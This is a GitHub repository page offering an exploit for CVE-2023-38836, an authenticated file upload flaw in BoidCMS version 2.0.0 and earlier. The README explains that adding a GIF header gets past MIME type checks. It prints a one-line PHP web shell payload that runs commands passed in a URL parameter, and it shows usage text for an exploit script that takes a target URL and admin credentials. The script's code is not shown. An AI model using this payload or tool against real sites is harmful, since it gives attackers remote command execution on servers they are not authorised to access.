Skip to content
/ CVE-2023-38836 Public

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

License

GPL-3.0 license
3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

1337kid/CVE-2023-38836

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits

CVE-2023-38836.py

CVE-2023-38836.py

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

img.png

img.png

 
 

Repository files navigation

CVE-2023-38836 Exploit

File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
To exploit, an attacker could add a GIF header to bypass MIME type checks.

GIF89a;
<?php system($_GET["cmd"]); ?>

Usage

usage: exp.py [-h] [-u URL] [-l USER] [-p PASSWD]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -l USER, --user USER  admin username
  -p PASSWD, --passwd PASSWD
                        admin password

About

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

Resources

Readme

License

GPL-3.0 license
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages